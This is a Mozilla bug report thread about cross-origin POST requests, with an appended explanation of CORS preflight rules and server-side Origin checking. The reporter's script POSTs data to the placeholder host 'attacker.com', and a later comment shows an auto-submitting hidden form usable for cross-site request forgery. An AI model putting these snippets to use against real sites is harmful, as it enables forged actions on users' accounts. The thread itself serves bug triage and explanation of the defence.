Bug 573003 - Firefox allows cross-domain POST requests via JavaScript
Status: RESOLVED WORKSFORME (Closed)
Opened 14 years ago; Closed 14 years ago
Product/Component: Firefox :: Security (defect)
Reporter: tkonrad; Assignee: Unassigned
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3

Firefox allows the submission of arbitrary POST requests to domains different from the originating one. This makes it a lot easier to mount Cross-Site Request Forgery attacks. Imagine one of the following situations where a JavaScript, which performs a malicious action on a different site (such as posting something on Facebook), is embedded into a site:

- A malicious web site administrator embeds a malicious JavaScript into his site.
- An attacker can embed arbitrary JavaScript into a frequently visited site (such as via a Cross-Site Scripting vulnerability).

Other browsers don't allow for cross-domain POST requests (I tested IE 8, Opera 10.53 and Chrome 5).

Reproducible: Always

Steps to Reproduce:
The following script demonstrates the issue (embed it into a site different from attacker.com):

<script language="javascript">
// POST a form-style body to another origin via XMLHttpRequest.
var fields = {'a' : 'b'};
postToUrl('http://attacker.com', fields);

function postToUrl(url, fields) {
  var http;
  try {
    // Legacy IE ActiveX transport
    http = new ActiveXObject('Microsoft.XMLHTTP');
  } catch(e) {
    http = new XMLHttpRequest();
  }
  // Builds "a=b&" (values are not URL-encoded and a trailing '&' is kept)
  var params = '';
  for (var key in fields) params += key + '=' + fields[key] + '&';
  http.open('POST', url, true);
  // No Content-Type header is set explicitly; the string body is sent as-is
  http.send(params);
}
</script>

Actual Results:
The POST request is sent.

Expected Results:
The POST request to domains different from the originating one should be denied.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
Comment 2•14 years ago
I don't believe this is a duplicate of bug 246476, we should not be allowing cross-domain XHR without a CORS response from the host. But I'm a little confused by the example. CSRF posts would be pointing at a victim site, in which case we should be blocking it. The code points the post at "attacker.com" which presumably would implement the CORS headers, but then it's not a CSRF attack. Of course malicious script can just create a form in the document DOM and submit it and bypass any cross-site XHR restrictions. If that's what you're talking about then this is a dupe of bug 246476, but then it should work identically in all major browsers.
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
Indeed, the code above can be rewritten as:

// url and params as in the reporter's snippet
var inp = document.createElement("input");
var form = document.createElement("form");
form.appendChild(inp);
inp.name = params;
form.action = url;
form.method = "POST";
document.body.appendChild(form);
form.submit();

that will work in all browsers. If I'm misunderstanding something, please reopen the bug. We definitely want to fix this if there really is a problem here, but I'd prefer not to have security bugs just laying around.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago → 14 years ago
Resolution: --- → WORKSFORME
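Added example, not code from this bug thread or from Firefox: the reporter's XHR POST and the form submission in comment 3 both reach the target server for the same reason. A POST whose only script-set header is a form, multipart or text/plain Content-Type is a "CORS-safelisted" request, which browsers send without a preflight, just like a submitted form; an Access-Control-Allow-Origin response only decides whether the calling page may read the reply. The block below models that rule (simplified; the real rule has further limits on header values), shows the properly encoded body the reporter's loop did not produce, and shows the server-side Origin check where CSRF protection actually has to live. All function names and the trusted-origin list are this example's own assumptions.

```javascript
// Added example (not code from the bug report or from Firefox): models the
// browser-side rule that decides whether a cross-origin request is sent
// without a CORS preflight, and the server-side check that has to catch it.
// Function and variable names are this example's own. Run with: node cors_demo.js

const SAFE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);
// Request headers a page may set without triggering a preflight
// (CORS-safelisted request headers; Content-Type only with the types above).
const SAFE_HEADERS = new Set([
  'accept', 'accept-language', 'content-language', 'content-type',
]);

// True if a cross-origin request with this method and these script-set
// headers goes straight to the target, exactly like a submitted <form>.
// Whether the target answers with Access-Control-Allow-Origin only decides
// whether the calling page can read the response; the request still lands.
function isSentWithoutPreflight(method, headers = {}) {
  if (!SAFE_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFE_HEADERS.has(lname)) return false;
    if (lname === 'content-type') {
      // Compare the MIME essence, ignoring parameters such as ;charset=UTF-8
      const essence = String(value).split(';')[0].trim().toLowerCase();
      if (!SAFE_CONTENT_TYPES.has(essence)) return false;
    }
  }
  return true;
}

// application/x-www-form-urlencoded body. The reporter's loop concatenates
// raw values and leaves a trailing '&'; URLSearchParams encodes properly.
function encodeForm(fields) {
  return new URLSearchParams(fields).toString();
}

// Server side. The Origin header on a cross-site POST is set by the browser
// and cannot be overridden by page script, so a state-changing endpoint can
// reject requests whose Origin is not the site's own. A missing or "null"
// Origin is rejected here; deployments that must accept such requests
// usually fall back to a Referer check or a synchronizer token.
// trustedOrigins holds canonical origins (scheme://host[:non-default port]).
function originIsTrusted(originHeader, trustedOrigins) {
  if (typeof originHeader !== 'string' || originHeader === 'null') return false;
  let origin;
  try {
    origin = new URL(originHeader).origin; // normalises scheme, host, port
  } catch (e) {
    return false;
  }
  return trustedOrigins.includes(origin);
}

// Constructed requests mirroring the thread: the reporter's XHR (a plain
// string body is sent as text/plain by XHR), a JSON API call, and a request
// carrying a custom header.
const samples = [
  { label: 'reporter XHR POST (text/plain)', method: 'POST',
    headers: { 'Content-Type': 'text/plain;charset=UTF-8' } },
  { label: 'form-encoded POST', method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' } },
  { label: 'JSON POST', method: 'POST',
    headers: { 'Content-Type': 'application/json' } },
  { label: 'POST with X-Requested-With', method: 'POST',
    headers: { 'X-Requested-With': 'XMLHttpRequest' } },
];

for (const s of samples) {
  const verdict = isSentWithoutPreflight(s.method, s.headers)
    ? 'sent without preflight (reaches the server like a form post)'
    : 'preflighted (blocked unless the server opts in)';
  console.log(`${s.label}: ${verdict}`);
}
console.log('body for {a: "b"}:', encodeForm({ a: 'b' }));
console.log('Origin https://attacker.example trusted by https://victim.example?',
  originIsTrusted('https://attacker.example', ['https://victim.example']));
```

The practical reading of the thread: a browser-side block on cross-origin POSTs cannot exist without also breaking ordinary cross-site forms, so the victim site has to reject forged requests itself, by Origin (or Referer) checks, anti-CSRF tokens, and SameSite cookies.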